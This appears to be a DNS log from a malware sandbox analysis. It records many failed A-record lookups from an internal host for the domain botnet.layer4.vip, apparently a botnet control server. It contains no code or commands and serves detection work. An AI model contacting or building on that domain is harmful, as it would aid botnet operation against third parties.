                                  Apr 9, 2023 03:31:08.005028009 CEST8.8.8.8192.168.2.230x56dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.069570065 CEST8.8.8.8192.168.2.230xd650Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.085973024 CEST8.8.8.8192.168.2.230xd650Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.126447916 CEST8.8.8.8192.168.2.230x196cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.150842905 CEST8.8.8.8192.168.2.230x196cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.239224911 CEST8.8.8.8192.168.2.230x6219Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.255199909 CEST8.8.8.8192.168.2.230x6219Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.270755053 CEST8.8.8.8192.168.2.230x6219Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.382821083 CEST8.8.8.8192.168.2.230xc86aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.398653984 CEST8.8.8.8192.168.2.230xc86aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.422847986 CEST8.8.8.8192.168.2.230xfc2dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.471868038 CEST8.8.8.8192.168.2.230xfc2dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.503614902 CEST8.8.8.8192.168.2.230xfc2dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.528263092 CEST8.8.8.8192.168.2.230xc79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.544136047 CEST8.8.8.8192.168.2.230xc79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.609006882 CEST8.8.8.8192.168.2.230xc79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.633116007 CEST8.8.8.8192.168.2.230x32c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.648797035 CEST8.8.8.8192.168.2.230x32c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.664465904 CEST8.8.8.8192.168.2.230x32c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.753353119 CEST8.8.8.8192.168.2.230x2b65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.777889013 CEST8.8.8.8192.168.2.230x2b65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.801986933 CEST8.8.8.8192.168.2.230x2b65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.876084089 CEST8.8.8.8192.168.2.230xb907Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.900542021 CEST8.8.8.8192.168.2.230xb907Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.925182104 CEST8.8.8.8192.168.2.230xb907Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.950954914 CEST8.8.8.8192.168.2.230xb907Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.976711988 CEST8.8.8.8192.168.2.230xc452Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.010287046 CEST8.8.8.8192.168.2.230xc452Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.066840887 CEST8.8.8.8192.168.2.230x8525Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.082825899 CEST8.8.8.8192.168.2.230x8525Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.098361015 CEST8.8.8.8192.168.2.230x8525Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.122767925 CEST8.8.8.8192.168.2.230x8525Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.138626099 CEST8.8.8.8192.168.2.230x8525Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.178900003 CEST8.8.8.8192.168.2.230x89bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.203372955 CEST8.8.8.8192.168.2.230x89bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.264039040 CEST8.8.8.8192.168.2.230x89bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.279690981 CEST8.8.8.8192.168.2.230x89bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.320045948 CEST8.8.8.8192.168.2.230x3b5dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.344866037 CEST8.8.8.8192.168.2.230x3b5dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.376241922 CEST8.8.8.8192.168.2.230x3b5dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.392430067 CEST8.8.8.8192.168.2.230xea41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.407936096 CEST8.8.8.8192.168.2.230xea41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.472363949 CEST8.8.8.8192.168.2.230xea41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.496593952 CEST8.8.8.8192.168.2.230xb543Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.512578964 CEST8.8.8.8192.168.2.230xb543Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.536546946 CEST8.8.8.8192.168.2.230xb543Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.560641050 CEST8.8.8.8192.168.2.230xb543Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.585166931 CEST8.8.8.8192.168.2.230xb543Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.682210922 CEST8.8.8.8192.168.2.230x6dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.740562916 CEST8.8.8.8192.168.2.230xee3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.764888048 CEST8.8.8.8192.168.2.230xee3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.868659019 CEST8.8.8.8192.168.2.230x755bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.964473009 CEST8.8.8.8192.168.2.230x55a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.013154984 CEST8.8.8.8192.168.2.230x55a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.053266048 CEST8.8.8.8192.168.2.230xc7b3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.084716082 CEST8.8.8.8192.168.2.230xc7b3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.132919073 CEST8.8.8.8192.168.2.230xa85bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.148547888 CEST8.8.8.8192.168.2.230xa85bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.219533920 CEST8.8.8.8192.168.2.230xf1fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.235032082 CEST8.8.8.8192.168.2.230xf1fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.250813961 CEST8.8.8.8192.168.2.230xf1fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.346405029 CEST8.8.8.8192.168.2.230x7feName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.426598072 CEST8.8.8.8192.168.2.230x952dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.450990915 CEST8.8.8.8192.168.2.230x952dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.466602087 CEST8.8.8.8192.168.2.230x952dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.491121054 CEST8.8.8.8192.168.2.230x952dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.547472954 CEST8.8.8.8192.168.2.230x8d33Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.571520090 CEST8.8.8.8192.168.2.230x8d33Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.612018108 CEST8.8.8.8192.168.2.230x7025Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.660641909 CEST8.8.8.8192.168.2.230x7025Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.684840918 CEST8.8.8.8192.168.2.230x7025Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.700356007 CEST8.8.8.8192.168.2.230x7025Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.741338015 CEST8.8.8.8192.168.2.230x2060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.765964031 CEST8.8.8.8192.168.2.230x2060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.790815115 CEST8.8.8.8192.168.2.230x2060Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.831207991 CEST8.8.8.8192.168.2.230xf79aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.847127914 CEST8.8.8.8192.168.2.230xf79aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.889614105 CEST8.8.8.8192.168.2.230xf79aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.914036989 CEST8.8.8.8192.168.2.230xf79aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.929877043 CEST8.8.8.8192.168.2.230xc30fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.945914984 CEST8.8.8.8192.168.2.230xc30fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.969943047 CEST8.8.8.8192.168.2.230xc30fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.994066954 CEST8.8.8.8192.168.2.230xc30fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.034226894 CEST8.8.8.8192.168.2.230x5535Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.122304916 CEST8.8.8.8192.168.2.230x5535Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.163021088 CEST8.8.8.8192.168.2.230x61f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.187031984 CEST8.8.8.8192.168.2.230x61f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.211837053 CEST8.8.8.8192.168.2.230x61f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.267631054 CEST8.8.8.8192.168.2.230x11f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.316282988 CEST8.8.8.8192.168.2.230x11f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.340837955 CEST8.8.8.8192.168.2.230x11f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.380857944 CEST8.8.8.8192.168.2.230xe5a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.404997110 CEST8.8.8.8192.168.2.230xe5a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.429071903 CEST8.8.8.8192.168.2.230xe5a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.469089031 CEST8.8.8.8192.168.2.230x7da3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.556116104 CEST8.8.8.8192.168.2.230x1869Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.620296955 CEST8.8.8.8192.168.2.230x1869Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.651710987 CEST8.8.8.8192.168.2.230xe9f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.693181992 CEST8.8.8.8192.168.2.230xe9f3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.809012890 CEST8.8.8.8192.168.2.230x493Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.833540916 CEST8.8.8.8192.168.2.230x493Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.851164103 CEST8.8.8.8192.168.2.230x493Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.882733107 CEST8.8.8.8192.168.2.230xbd4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.898339033 CEST8.8.8.8192.168.2.230xbd4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.914020061 CEST8.8.8.8192.168.2.230xbd4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.929506063 CEST8.8.8.8192.168.2.230xbd4aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.969628096 CEST8.8.8.8192.168.2.230x75eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.052059889 CEST8.8.8.8192.168.2.230xaaffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.093759060 CEST8.8.8.8192.168.2.230xaaffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.119443893 CEST8.8.8.8192.168.2.230xaaffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.144028902 CEST8.8.8.8192.168.2.230xaaffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.160357952 CEST8.8.8.8192.168.2.230x74cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.192507982 CEST8.8.8.8192.168.2.230x74cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.258200884 CEST8.8.8.8192.168.2.230x50eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.331172943 CEST8.8.8.8192.168.2.230x50eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.372129917 CEST8.8.8.8192.168.2.230xaa21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.396505117 CEST8.8.8.8192.168.2.230xaa21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.445379972 CEST8.8.8.8192.168.2.230xaa21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.462111950 CEST8.8.8.8192.168.2.230xfb8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.528007030 CEST8.8.8.8192.168.2.230xfb8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.633752108 CEST8.8.8.8192.168.2.230x19e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.658128023 CEST8.8.8.8192.168.2.230x19e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.682451963 CEST8.8.8.8192.168.2.230x5eefName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.766915083 CEST8.8.8.8192.168.2.230x5eefName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.942047119 CEST8.8.8.8192.168.2.230xc837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.958008051 CEST8.8.8.8192.168.2.230xc837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.973815918 CEST8.8.8.8192.168.2.230xc837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.990016937 CEST8.8.8.8192.168.2.230xc7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.030520916 CEST8.8.8.8192.168.2.230xc7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.054713964 CEST8.8.8.8192.168.2.230xc7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.079587936 CEST8.8.8.8192.168.2.230xc7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.095540047 CEST8.8.8.8192.168.2.230x12f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.119947910 CEST8.8.8.8192.168.2.230x12f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.145024061 CEST8.8.8.8192.168.2.230x12f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.161015987 CEST8.8.8.8192.168.2.230x12f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.176839113 CEST8.8.8.8192.168.2.230x12f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.201700926 CEST8.8.8.8192.168.2.230x2d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.217679977 CEST8.8.8.8192.168.2.230x2d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.241791010 CEST8.8.8.8192.168.2.230x2d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.266372919 CEST8.8.8.8192.168.2.230x2d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.282013893 CEST8.8.8.8192.168.2.230x2d3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.306386948 CEST8.8.8.8192.168.2.230x70ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.419634104 CEST8.8.8.8192.168.2.230x80eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.534611940 CEST8.8.8.8192.168.2.230xb105Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.657460928 CEST8.8.8.8192.168.2.230x7fbfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.724828005 CEST8.8.8.8192.168.2.230x2703Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.750060081 CEST8.8.8.8192.168.2.230x2703Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.774904013 CEST8.8.8.8192.168.2.230x2703Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.816663027 CEST8.8.8.8192.168.2.230x2703Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.833071947 CEST8.8.8.8192.168.2.230x5257Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.903772116 CEST8.8.8.8192.168.2.230x5257Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.959682941 CEST8.8.8.8192.168.2.230x1e2cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.041203976 CEST8.8.8.8192.168.2.230xf2d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.056991100 CEST8.8.8.8192.168.2.230xf2d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.073074102 CEST8.8.8.8192.168.2.230xf2d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.088964939 CEST8.8.8.8192.168.2.230xf2d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.129542112 CEST8.8.8.8192.168.2.230x7d8aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.178047895 CEST8.8.8.8192.168.2.230x7d8aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.274758101 CEST8.8.8.8192.168.2.230x91caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.290342093 CEST8.8.8.8192.168.2.230x91caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.428869963 CEST8.8.8.8192.168.2.230xff97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.453404903 CEST8.8.8.8192.168.2.230x1d8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.469249010 CEST8.8.8.8192.168.2.230x1d8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.484977007 CEST8.8.8.8192.168.2.230x1d8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.581003904 CEST8.8.8.8192.168.2.230x3623Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.596688032 CEST8.8.8.8192.168.2.230x3623Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.620953083 CEST8.8.8.8192.168.2.230x3623Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.661227942 CEST8.8.8.8192.168.2.230x5698Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.685739994 CEST8.8.8.8192.168.2.230x5698Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.735999107 CEST8.8.8.8192.168.2.230x5698Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.760646105 CEST8.8.8.8192.168.2.230x1c08Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.792186022 CEST8.8.8.8192.168.2.230x1c08Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.816457033 CEST8.8.8.8192.168.2.230x1c08Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.831978083 CEST8.8.8.8192.168.2.230x1c08Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.871815920 CEST8.8.8.8192.168.2.230xb7f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.927809000 CEST8.8.8.8192.168.2.230xb7f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.943821907 CEST8.8.8.8192.168.2.230xade4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.072808981 CEST8.8.8.8192.168.2.230xf81fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.128717899 CEST8.8.8.8192.168.2.230xf81fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.153234005 CEST8.8.8.8192.168.2.230xde2fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.202068090 CEST8.8.8.8192.168.2.230xde2fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.217648029 CEST8.8.8.8192.168.2.230xde2fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.290972948 CEST8.8.8.8192.168.2.230xa643Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.339623928 CEST8.8.8.8192.168.2.230xa643Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.355156898 CEST8.8.8.8192.168.2.230xa643Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.379359007 CEST8.8.8.8192.168.2.230xbcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
